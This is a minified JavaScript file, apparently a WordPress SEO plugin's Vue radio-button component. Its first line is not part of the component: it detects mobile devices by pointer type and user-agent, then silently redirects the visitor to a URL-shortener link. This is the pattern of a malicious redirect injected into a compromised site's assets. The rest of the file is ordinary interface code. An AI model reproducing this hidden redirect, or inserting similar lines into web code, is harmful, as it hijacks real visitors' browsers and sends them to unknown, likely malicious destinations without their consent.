(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{S as d}from"./Checkmark.51de2d05.js";import{aq as m,f as o,i as p,B as r,j as s,P as i,Q as f,M as g,T as _,af as c}from"./vendor-vue-ui.232c7c36.js";import{_ as y}from"./_plugin-vue_export-helper.eefbdd86.js";const b={components:{SvgCheckmark:d},props:{modelValue:[String,Boolean],name:String,labelClass:{type:String,default(){return""}},inputClass:{type:String,default(){return""}},id:String,size:String,disabled:Boolean,type:{type:Number,default(){return 1}}},computed:{typeClass(){return`type-${this.type}`}},methods:{labelToggle(){this.$refs.input.click()}}},k={class:"form-radio-wrapper"},h={class:"form-radio"},C=["checked","disabled","name","id"],B={class:"fancy-radio"};function S(l,a,e,T,V,t){const u=m("svg-checkmark");return o(),p("label",{class:i(["aioseo-radio",[e.labelClass,{[e.size]:e.size},t.typeClass,{disabled:e.disabled}]]),onKeydown:[a[1]||(a[1]=c((...n)=>t.labelToggle&&t.labelToggle(...n),["enter"])),a[2]||(a[2]=c((...n)=>t.labelToggle&&t.labelToggle(...n),["space"]))],onClick:_(()=>{},["stop"])},[r(l.$slots,"header"),s("span",k,[s("span",h,[s("input",{type:"radio",onInput:a[0]||(a[0]=n=>l.$emit("update:modelValue",n.target.checked)),checked:e.modelValue,disabled:e.disabled,name:e.name,id:e.id,class:i(e.inputClass),ref:"input"},null,42,C),s("span",B,[e.type===1?(o(),f(u,{key:0})):g("",!0)])])]),r(l.$slots,"default")],34)}const x=y(b,[["render",S]]);export{x as B};
